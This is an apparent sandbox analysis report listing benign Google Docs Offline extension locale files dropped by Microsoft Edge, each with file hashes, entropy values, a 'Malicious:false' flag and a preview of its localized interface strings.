                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):858
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                          MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                          SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                          SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                          SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\is\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):954
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                          MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                          SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                          SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                          SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\it\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):899
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                          MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                          SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                          SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                          SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\iw\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2230
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                          MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                          SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                          SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                          SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\ja\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1160
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                          MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                          SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                          SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                          SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\ka\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3264
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                          MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                          SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                          SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                          SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\kk\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3235
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                          MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                          SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                          SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                          SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\km\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3122
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                          MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                          SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                                          SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                          SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\kn\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1895
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                          MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                          SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                                          SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                          SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\ko\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1042
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                          MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                                          SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                          SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                                          SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\lo\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2535
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                          MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                          SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                                          SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                          SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\lt\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1028
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                          MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                                          SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                          SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                          SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\lv\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):994
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                          MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                          SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
